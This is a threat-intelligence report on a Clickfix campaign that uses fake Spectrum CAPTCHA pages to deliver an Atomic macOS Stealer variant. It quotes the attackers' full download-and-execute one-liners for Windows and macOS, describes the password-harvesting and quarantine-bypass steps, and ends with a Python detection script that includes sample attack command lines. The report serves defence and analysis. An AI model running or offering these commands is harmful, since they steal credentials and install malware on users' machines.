AMOS Variant Distributed Via Clickfix In Spectrum-Themed Dynamic Delivery Campaign By Russian Speaking Hackers

CloudSEK researchers have uncovered a sophisticated campaign leveraging typo-squatted “Spectrum” domains to spread a new Atomic macOS Stealer (AMOS) variant. Disguised as a CAPTCHA verification, the attack uses dynamic payloads tailored to the victim's OS—stealing passwords, bypassing macOS security, and executing malware. With Russian-language comments found in the code and flawed delivery logic, the campaign reflects both growing cross-platform ambitions and rushed execution. Dive into how this multi-platform threat operates—and why your organization should stay alert.

Koushik Pal
June 4, 2025
Green Alert
Last Update posted on
June 5, 2025

Executive Summary

A new Atomic macOS Stealer (AMOS) variant campaign has been uncovered, leveraging typo-squatted domains mimicking Spectrum, a U.S.-based telecom provider. The campaign employs the Clickfix method and delivers different payloads based on the victim's operating system. Notably, macOS users are served a malicious shell script designed to steal system passwords and download an AMOS variant for further exploitation. The script uses native macOS commands to harvest credentials, bypass security mechanisms, and execute malicious binaries. Russian-language comments in the source code suggest involvement of Russian-speaking cybercriminals. Poorly implemented logic in the delivery sites, such as mismatched instructions across platforms, points to hastily assembled infrastructure. This campaign highlights an increasing trend in multi-platform social engineering attacks targeting both consumer and corporate users.

Analysis 

During the routine attacker infrastructure discovery and attribution cycle, we discovered a number of Clickfix-themed delivery websites typosquatting Spectrum, a US-based company providing cable television, internet access, internet security, managed services, mobile phone, and unified communications services.

When the victim clicks on “Alternative Verification”, a command is copied to the clipboard and instructions are displayed for the victim to follow, just like any other Clickfix campaign.

However, upon investigating further, we discovered that the website returned different responses based on varying user-agents.

Clipboard - non-macOS user agent

powershell -NoProfile -ExecutionPolicy Bypass -Command "$file = [System.IO.Path]::Combine($env:TEMP, 'api.ps1'); Invoke-WebRequest -Uri 'https://cf-verifi[.]pages[.]dev/i.txt' -OutFile $file; & $file" # ㅤCloudflareㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ

This is one of the most commonly used delivery methods for Windows users.

Clipboard - macOS user agent

/bin/bash -c "$(curl -fsSL https://applemacios[.]com/getrur/install.sh)" # MacOS Verification #248187 authenticated by Cloudflare. Copyright Cloudflare 2025.

/bin/bash -c "...": This tells the system to run the command inside the quotes using the Bash shell.

curl -fsSL <URL>:

  • -f: Fail silently on HTTP errors.
  • -s: Silent mode (no progress output).
  • -S: Show error if -s is used and the request fails.
  • -L: Follow redirects.
  • It downloads the contents of the script hosted at https://applemacios[.]com/getrur/install.sh.

The output of curl (i.e., the install.sh script) is executed immediately by Bash.

Contents of install.sh

Password Harvesting:

  1. Gets Current User: username=$(whoami)
  2. Password Prompt Loop: Continuously prompts "System Password:" until the correct password is entered
  3. Password Validation: Uses dscl . -authonly to verify the password against macOS directory services
  4. Password Storage: Saves the valid password to the file /tmp/.pass

Download & Execution:

  1. Downloads Payload: curl -o /tmp/update https://applemacios[.]com/getrur/update
  2. Removes Quarantine: Uses the stolen password with sudo -S xattr -c to clear the file's extended attributes (including the quarantine flag), bypassing macOS security
  3. Makes Executable: chmod +x /tmp/update
  4. Executes Malware: Runs the downloaded file /tmp/update

Upon analyzing the file saved as “update” within the /tmp directory, we discovered that the malware belongs to the Atomic macOS Stealer (AMOS) family. AMOS variants such as Poseidon and Odyssey have been seen in the wild lately, gaining traction among cybercriminals.

Attribution

While inspecting the source code of the delivery page, we came across a couple of comments in Russian, indicating that the malware is likely being spread by Russian-speaking cybercriminals. Using these comments as a pivot point, along with other HTTP parameters, we were able to find IOFAs (Indicators of Future Attack) in addition to the IOCs.

The delivery pages in question for this AMOS variant campaign contained inaccuracies in both their programming and front-end logic. For Linux user agents, a PowerShell command was copied to the clipboard. Furthermore, the instruction "Press & hold the Windows Key + R" was displayed to both Windows and Mac users.

IOCs & IOFAs

| Indicator Type | Value | Use |
|---|---|---|
| Domain | panel-spectrum[.]net | Clickfix Delivery |
| Domain | spectrum-ticket[.]net | Clickfix Delivery |
| Domain | cf-verifi.pages[.]dev | Command and Control |
| Domain | applemacios[.]com | Command and Control |
| MD5 Hash | eaedee8fc9fe336bcde021bf243e332a | AMOS Variant |
| URL | https://cf-verifi.pages[.]dev/i.txt | Contacted URLs |
| URL | https://applemacios[.]com/getrur/install.sh | Contacted URLs |
| URL | https://applemacios[.]com/getrur/update | Contacted URLs |
| Domain | rugme[.]cat | Clickfix Indicator of future attack |

Impact

  • Corporate Credential Compromise: By harvesting macOS user passwords, attackers can gain access to corporate systems, VPNs, and internal resources, potentially enabling lateral movement.
  • Bypass of Endpoint Security Controls: The malware uses legitimate utilities (dscl, sudo, xattr) to bypass macOS security mechanisms, reducing the chance of detection by traditional antivirus or EDR solutions.
  • Initial Access for Broader Intrusions: Stolen credentials and persistent access may be sold to access brokers or used for follow-on attacks such as ransomware or data exfiltration.

Mitigations

  • User Awareness Training: Educate employees and users about password-stealing tactics, especially those disguised as system verification prompts.
  • macOS Endpoint Hardening: Enforce system integrity protections and restrict execution of unsigned scripts using tools like Gatekeeper and MDM policies.
  • Threat Hunting for AMOS Activity: Monitor logs and endpoints for signs of password prompt abuse, unusual sudo activity, and known AMOS indicators.
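As an added hunting example (not code from the original report or from CloudSEK), the following Python scans a shell-history or process-log excerpt for the install.sh behaviours listed under "Contents of install.sh" and for the invisible clipboard padding visible in the Windows one-liner above; the sample lines are constructed, and the regexes, filler set and padding threshold are assumptions.

```python
import re
import unicodedata

# Hunting patterns for the behaviours this report describes: a curl|bash one-liner,
# dscl password validation, a payload pulled into /tmp, the stolen password fed to
# sudo -S for xattr -c, and chmod +x on the downloaded file.
PATTERNS = {
    "curl_pipe_to_shell": re.compile(r'bash\s+-c\s+"\$\(curl\s+-[fsSL]+\s+https?://'),
    "dscl_authonly": re.compile(r"\bdscl\s+\.\s+-authonly\b"),
    "password_file_tmp": re.compile(r"/tmp/\.pass\b"),
    "curl_download_to_tmp": re.compile(r"\bcurl\b.*\s-o\s+/tmp/"),
    "sudo_stdin_xattr_clear": re.compile(r"\bsudo\s+-S\b.*\bxattr\s+-c\b"),
    "chmod_exec_tmp": re.compile(r"\bchmod\s+\+x\s+/tmp/"),
}

# Invisible characters used to pad a clipboard command after its '#' comment so the
# real command scrolls out of view (the page's Windows sample uses U+3164 HANGUL FILLER).
FILLERS = {"\u3164", "\u115f", "\u1160"}

def hidden_padding(cmd: str, min_run: int = 8) -> bool:
    """True when the comment part of cmd carries a run of invisible non-ASCII characters."""
    tail = cmd.split("#", 1)[1] if "#" in cmd else ""
    invisible = [ch for ch in tail
                 if ch in FILLERS or (ord(ch) > 127 and unicodedata.category(ch) in ("Zs", "Cf"))]
    return len(invisible) >= min_run

def scan(lines):
    """Return [(line_no, [hit names])] for every line that trips at least one check."""
    hits = []
    for n, line in enumerate(lines, 1):
        names = [name for name, pat in PATTERNS.items() if pat.search(line)]
        if hidden_padding(line):
            names.append("hidden_clipboard_padding")
        if names:
            hits.append((n, names))
    return hits

# Constructed sample shell-history excerpt modelled on the steps in this report
# (domains defanged as the page lists them); lines 1 and 8 are benign noise.
SAMPLE = [
    "ls -la ~/Downloads",
    '/bin/bash -c "$(curl -fsSL https://applemacios[.]com/getrur/install.sh)" # MacOS Verification #248187',
    'dscl . -authonly "$username" "$password"',
    "cat > /tmp/.pass",
    "curl -o /tmp/update https://applemacios[.]com/getrur/update",
    "sudo -S xattr -c /tmp/update",
    "chmod +x /tmp/update",
    "git status",
    'powershell -NoProfile -Command "..." # ' + "\u3164" * 12,
]
```

Running scan(SAMPLE) flags lines 2 through 7 and line 9 and leaves the two benign lines untouched; on a real endpoint the same checks can be pointed at ~/.zsh_history, ~/.bash_history or EDR process-creation events.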
